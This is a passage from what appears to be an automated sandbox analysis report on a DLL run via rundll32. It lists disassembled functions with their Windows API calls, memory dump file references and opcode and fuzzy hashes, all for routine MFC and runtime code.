                                                                                                                      • LocalReAlloc.KERNEL32(?,00000000,00000002,00000000,00000010,?,?,00000000,?,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004), ref: 10020AB6
                                                                                                                      • LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004,10001031,00000000), ref: 10020AC3
                                                                                                                        • Part of subcall function 100201BD: __CxxThrowException@8.LIBCMT ref: 100201D1
                                                                                                                      • _memset.LIBCMT ref: 10020AE2
                                                                                                                      • TlsSetValue.KERNEL32(?,00000000), ref: 10020AF3
                                                                                                                      • LeaveCriticalSection.KERNEL32(?,?,00000000,?,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004,10001031,00000000), ref: 10020B14
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471453842.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471449421.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471478621.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471486430.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471491680.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471497117.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CriticalLeaveSection$Exception@8Throw$AllocExceptionLocalRaiseValue_memset
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 356813703-0
                                                                                                                      • Opcode ID: 83477c0e15d1c33d1bb5ec65c1815380ae7d3f4553bdd0be20f92f622c24e4f3
                                                                                                                      • Instruction ID: 3e12b38782b34356c97e10a87625d487b7a933956f885299f771b8ffc362d3ba
                                                                                                                      • Opcode Fuzzy Hash: 83477c0e15d1c33d1bb5ec65c1815380ae7d3f4553bdd0be20f92f622c24e4f3
                                                                                                                      • Instruction Fuzzy Hash: 7B117974100305AFE721EF60CD86D2ABBA6EF44314B51C029F8569A622DB30FC60CB50
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 10020EEA Relevance: 10.5, APIs: 7, Instructions: 29COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471453842.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471449421.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471478621.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471486430.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471491680.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471497117.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Color$Brush
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2798902688-0
                                                                                                                      • Opcode ID: 72252987b8d251bab477bb0d0c872f96bc616149d35122bfb9b146a10746700a
                                                                                                                      • Instruction ID: b96cbce945517a62156269669ca61c0ebe7744eb3e98ebe12a1aee9bfd1db884
                                                                                                                      • Opcode Fuzzy Hash: 72252987b8d251bab477bb0d0c872f96bc616149d35122bfb9b146a10746700a
                                                                                                                      • Instruction Fuzzy Hash: 65F012719407449BD730BF728D49B47BAD5FFC4710F02092EE2418B990E6B6E040DF44
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 1002981B Relevance: 9.4, APIs: 6, Instructions: 404COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • __EH_prolog3.LIBCMT ref: 10029837
                                                                                                                      • VariantClear.OLEAUT32(?), ref: 1002989C
                                                                                                                        • Part of subcall function 100201F1: __CxxThrowException@8.LIBCMT ref: 10020205
                                                                                                                      • VariantClear.OLEAUT32(?), ref: 10029AAB
                                                                                                                      • VariantClear.OLEAUT32(?), ref: 10029B1D
                                                                                                                      • VariantClear.OLEAUT32(?), ref: 10029D0E
                                                                                                                        • Part of subcall function 1002BDB9: VariantCopy.OLEAUT32(?,?), ref: 1002BDC7
                                                                                                                        • Part of subcall function 10013820: _DebugHeapAllocator.LIBCPMTD ref: 10013875
                                                                                                                        • Part of subcall function 1002C06F: __EH_prolog3.LIBCMT ref: 1002C079
                                                                                                                        • Part of subcall function 1002C06F: lstrlenA.KERNEL32(?,00000224,10029CDA,?,00000008,00000000,?,000000CC), ref: 1002C098
                                                                                                                        • Part of subcall function 1002C06F: SysAllocStringByteLen.OLEAUT32(?,00000000), ref: 1002C0A0
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471453842.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471449421.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471478621.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471486430.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471491680.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471497117.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Variant$Clear$H_prolog3$AllocAllocatorByteCopyDebugException@8HeapStringThrowlstrlen
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 63617653-0
                                                                                                                      • Opcode ID: 2a6cfdb99f9de51eb90a51f5ea514ffac437b21a8e7b67f1d76bd152894c2f6f
                                                                                                                      • Instruction ID: 1b2bd9fb6b1df5d5f83e0c816a53a5057bef739e6a7686bc2bbf7ce06708db6b
                                                                                                                      • Opcode Fuzzy Hash: 2a6cfdb99f9de51eb90a51f5ea514ffac437b21a8e7b67f1d76bd152894c2f6f
                                                                                                                      • Instruction Fuzzy Hash: 06F16D7890024CEBDF55DFA0E890AFD7BB9EF08384F90405AFC5593191DB74AA88DB61
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 1002D1E9 Relevance: 9.3, APIs: 6, Instructions: 253stringCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • __EH_prolog3_catch_GS.LIBCMT ref: 1002D1F0
                                                                                                                      • lstrlenA.KERNEL32(00000000,000000FF,00000050,10022221,00000000,00000001,?,?,000000FF,?,?,?), ref: 1002D222
                                                                                                                        • Part of subcall function 10017790: _memcpy_s.LIBCMT ref: 100177A0
                                                                                                                      • _memset.LIBCMT ref: 1002D2F2
                                                                                                                      • VariantClear.OLEAUT32(?), ref: 1002D3D1
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471453842.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471449421.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471478621.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471486430.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471491680.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471497117.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: ClearH_prolog3_catch_Variant_memcpy_s_memsetlstrlen
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4021759052-0
                                                                                                                      • Opcode ID: dc537336900b1f9e5654c723f7bc7d689170c1efb2efdbad80408bb984cec35a
                                                                                                                      • Instruction ID: 5c01f4bcc98ccee0a604cdfa5feeb0fdece88e80b40f5b50a3c571396f452454
                                                                                                                      • Opcode Fuzzy Hash: dc537336900b1f9e5654c723f7bc7d689170c1efb2efdbad80408bb984cec35a
                                                                                                                      • Instruction Fuzzy Hash: 50A18C35C04249DBCF11EFA4E985AEEBBF0FF04350FA0415AE914AB291D734AE41DB61
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 1002D5D0 Relevance: 9.1, APIs: 6, Instructions: 118memoryCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • _memset.LIBCMT ref: 1002D5FF
                                                                                                                      • SysAllocString.OLEAUT32(00000000), ref: 1002D650
                                                                                                                      • SysAllocString.OLEAUT32(00000000), ref: 1002D674
                                                                                                                        • Part of subcall function 100200B9: __EH_prolog3.LIBCMT ref: 100200C0
                                                                                                                      • SysAllocString.OLEAUT32(00000000), ref: 1002D6CC
                                                                                                                      • SysAllocString.OLEAUT32(00000000), ref: 1002D6F5
                                                                                                                      • SysAllocString.OLEAUT32(00000000), ref: 1002D724
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471453842.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471449421.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471478621.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471486430.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471491680.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471497117.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: AllocString$H_prolog3_memset
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 842698744-0
                                                                                                                      • Opcode ID: 4c578374896238df2dea9fd45ffcc7e6003ce540e2fdc04b6e0d27b1621fe4e8
                                                                                                                      • Instruction ID: 1a39fa9d0276ee84c07bd3808c66cb0226ddbd666de5b2da3b26845cb98b16c2
                                                                                                                      • Opcode Fuzzy Hash: 4c578374896238df2dea9fd45ffcc7e6003ce540e2fdc04b6e0d27b1621fe4e8
                                                                                                                      • Instruction Fuzzy Hash: 2A414A34900204CFDB24EFB8D891AADB7B5EF04314F50852EF9659B2A2DB74A854CF55
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 100169E1 Relevance: 9.1, APIs: 6, Instructions: 115threadwindowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 10016936: GetParent.USER32(100010EC), ref: 10016989
                                                                                                                        • Part of subcall function 10016936: GetLastActivePopup.USER32(100010EC), ref: 10016998
                                                                                                                        • Part of subcall function 10016936: IsWindowEnabled.USER32(100010EC), ref: 100169AD
                                                                                                                        • Part of subcall function 10016936: EnableWindow.USER32(100010EC,00000000), ref: 100169C0
                                                                                                                      • EnableWindow.USER32(?,00000001), ref: 10016A2E
                                                                                                                      • GetWindowThreadProcessId.USER32(?,?), ref: 10016A3C
                                                                                                                      • GetCurrentProcessId.KERNEL32 ref: 10016A46
                                                                                                                      • SendMessageA.USER32 ref: 10016A5B
                                                                                                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 10016AD8
                                                                                                                      • EnableWindow.USER32(?,00000001), ref: 10016B14
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471453842.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471449421.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471478621.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471486430.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471491680.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471497117.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$Enable$Process$ActiveCurrentEnabledFileLastMessageModuleNameParentPopupSendThread
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1877664794-0
                                                                                                                      • Opcode ID: 95381fcf6bb93498e4705e7f988ebefb44252e0409dc997f8ee4f854a67ce631
                                                                                                                      • Instruction ID: 27039e4540ef9999db1a35b9c590bf271b8d22289eaaf12d3c9627bdabeff3d4
                                                                                                                      • Opcode Fuzzy Hash: 95381fcf6bb93498e4705e7f988ebefb44252e0409dc997f8ee4f854a67ce631
                                                                                                                      • Instruction Fuzzy Hash: CE416A72A00258DBEB30CFA4CC81BDE77A8EF09350F614119E949EB281EB70D9848F52
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 10016936 Relevance: 9.1, APIs: 6, Instructions: 68COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetWindowLongA.USER32(100010EC,000000F0), ref: 10016968
                                                                                                                      • GetParent.USER32(100010EC), ref: 10016976
                                                                                                                      • GetParent.USER32(100010EC), ref: 10016989
                                                                                                                      • GetLastActivePopup.USER32(100010EC), ref: 10016998
                                                                                                                      • IsWindowEnabled.USER32(100010EC), ref: 100169AD
                                                                                                                      • EnableWindow.USER32(100010EC,00000000), ref: 100169C0
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471453842.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471449421.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471478621.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471486430.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471491680.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471497117.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$Parent$ActiveEnableEnabledLastLongPopup
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 670545878-0
                                                                                                                      • Opcode ID: 0556ac702c88567a1be081abf13cc9cce852e4592f4cca89957eeb32636ff491
                                                                                                                      • Instruction ID: 154aafdfd528b469a8bf80fc48512ff59873e22bfc4d6b8fcadc8b05587993e6
                                                                                                                      • Opcode Fuzzy Hash: 0556ac702c88567a1be081abf13cc9cce852e4592f4cca89957eeb32636ff491
                                                                                                                      • Instruction Fuzzy Hash: D111A57260133697D661DB698E80B1BB6ECDF9EAE1F120115ED00EF254EB70DC808696
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 10020559 Relevance: 9.0, APIs: 6, Instructions: 45COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • ClientToScreen.USER32(?,?), ref: 10020568
                                                                                                                      • GetDlgCtrlID.USER32 ref: 1002057C
                                                                                                                      • GetWindowLongA.USER32(00000000,000000F0), ref: 1002058A
                                                                                                                      • GetWindowRect.USER32 ref: 1002059C
                                                                                                                      • PtInRect.USER32(?,?,?), ref: 100205AC
                                                                                                                      • GetWindow.USER32(?,00000005), ref: 100205B9
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471453842.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471449421.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471478621.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471486430.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471491680.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471497117.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$Rect$ClientCtrlLongScreen
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1315500227-0
                                                                                                                      • Opcode ID: 6e799736a4181f77db8ba904b29fc337daefc7dc264e49bf5415e2b3170b0d90
                                                                                                                      • Instruction ID: 9197e044a219b4c4c22350dcb983fe24fb7029e94376554506d026f7e511957d
                                                                                                                      • Opcode Fuzzy Hash: 6e799736a4181f77db8ba904b29fc337daefc7dc264e49bf5415e2b3170b0d90
                                                                                                                      • Instruction Fuzzy Hash: 3B01A235501739EBEB11DF549C48E9F3BADEF4A791F404011FD10D2061E730DA018B99
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 1001D992 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 234COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471453842.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471449421.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471478621.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471486430.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471491680.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471497117.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: _memset
                                                                                                                      • String ID: @$@$AfxFrameOrView80s$AfxMDIFrame80s
                                                                                                                      • API String ID: 2102423945-4122032997
                                                                                                                      • Opcode ID: 34855274ca0ecd676c0cb297c8efdd531dfb4bca4f276cdc03237f3f296c8161
                                                                                                                      • Instruction ID: bbe41a20c7329c8f9bdc0efe2c46215e461a01fcfe5e7bc54fed728f21783543
                                                                                                                      • Opcode Fuzzy Hash: 34855274ca0ecd676c0cb297c8efdd531dfb4bca4f276cdc03237f3f296c8161
                                                                                                                      • Instruction Fuzzy Hash: B0816076D04219AADB40EFA4D481BDEBBF8EF04384F518566F909EB181E774DAC4CB90
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 10021D88 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 126stringCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GlobalLock.KERNEL32 ref: 10021DB2
                                                                                                                      • lstrlenA.KERNEL32(?), ref: 10021DFA
                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000020), ref: 10021E14
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471453842.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471449421.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471478621.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471486430.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471491680.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471497117.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: ByteCharGlobalLockMultiWidelstrlen
                                                                                                                      • String ID: System
                                                                                                                      • API String ID: 1529587224-3470857405
                                                                                                                      • Opcode ID: 4417374c3a9af998ac59b3fd5f055eb156b99ac3cd6379673959887b61f9b9dc
                                                                                                                      • Instruction ID: 76e901679f7557a4ddbab0066ed26c1097b584537e780c29b8b672eedf99bc1e
                                                                                                                      • Opcode Fuzzy Hash: 4417374c3a9af998ac59b3fd5f055eb156b99ac3cd6379673959887b61f9b9dc
                                                                                                                      • Instruction Fuzzy Hash: CC41C275D00215DFDF14CFA4DD85AEEBBB5EF14310F51822AE802DB285EB70A946CB50
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 100233C4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 98libraryloaderCOMMONLIBRARYCODE
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • __EH_prolog3_GS.LIBCMT ref: 100233CB
                                                                                                                      • GetModuleHandleA.KERNEL32(?,1004B63C,00000000,?), ref: 10023496
                                                                                                                      • GetProcAddress.KERNEL32(00000000,MFCM80ReleaseManagedReferences), ref: 100234A6
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471453842.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471449421.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471478621.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471486430.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471491680.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471497117.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: AddressH_prolog3_HandleModuleProc
                                                                                                                      • String ID: MFCM80ReleaseManagedReferences$mfcm80.dll
                                                                                                                      • API String ID: 2418878492-2500072749
                                                                                                                      • Opcode ID: b0e0a0a37f3552f3ecb8dafd0a082c9c0df66c75591a9635effa9e0eee7a218d
                                                                                                                      • Instruction ID: 416d3485c59068a364c2a46f33bf17d30033b20eabc5154db7a9307924c289c3
                                                                                                                      • Opcode Fuzzy Hash: b0e0a0a37f3552f3ecb8dafd0a082c9c0df66c75591a9635effa9e0eee7a218d
                                                                                                                      • Instruction Fuzzy Hash: 45318F74A006449FCF06EFA0D8957AD77F9EF48300F914098E905EB292DB78EE04CB55
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 10015723 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 92windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetMenuCheckMarkDimensions.USER32 ref: 1001573B
                                                                                                                      • _memset.LIBCMT ref: 1001579D
                                                                                                                      • CreateBitmap.GDI32(?,?,00000001,00000001,?), ref: 100157EF
                                                                                                                      • LoadBitmapA.USER32 ref: 10015807
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471453842.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471449421.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471478621.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471486430.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471491680.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471497117.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Bitmap$CheckCreateDimensionsLoadMarkMenu_memset
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4271682439-3916222277
                                                                                                                      • Opcode ID: c2f9d16966c3e05c0f00d4b6f85f81d85042d6ca8df7dc6027e25f19a9a67901
                                                                                                                      • Instruction ID: 5c54a231f9e9e48bd6b355c1aaa1100c674665813244494f34750a8ed28325e6
                                                                                                                      • Opcode Fuzzy Hash: c2f9d16966c3e05c0f00d4b6f85f81d85042d6ca8df7dc6027e25f19a9a67901
                                                                                                                      • Instruction Fuzzy Hash: 1B31C072A00216DFEB10CF78DDCAAAE7BA5EB44645F15052AE506EF2C1EA31E9448750
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 10023B21 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 92comCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • __EH_prolog3_GS.LIBCMT ref: 10023B2B
                                                                                                                      • GetObjectA.GDI32(100188B8,0000003C,?), ref: 10023B7D
                                                                                                                      • GetDeviceCaps.GDI32(?,0000005A), ref: 10023BED
                                                                                                                      • OleCreateFontIndirect.OLEAUT32(00000020,1004B6CC), ref: 10023C19
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471453842.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471449421.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471478621.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471486430.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471491680.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471497117.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CapsCreateDeviceFontH_prolog3_IndirectObject
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2429671754-3916222277
                                                                                                                      • Opcode ID: 0b083a6c98d2b7d8e028f34a6b6374e6a807bb31420a17051dfa8a45a9cb4bd1
                                                                                                                      • Instruction ID: e2743fe1d96de1c748b152781f443ff04db9fb8b7a9177862e5f836bc5268938
                                                                                                                      • Opcode Fuzzy Hash: 0b083a6c98d2b7d8e028f34a6b6374e6a807bb31420a17051dfa8a45a9cb4bd1
                                                                                                                      • Instruction Fuzzy Hash: 5A41AD38D01289DEDB11CFE4D951ADDFBF4EF18340F20816AE945EB292EB749A44CB11
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 10018D05 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 64COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
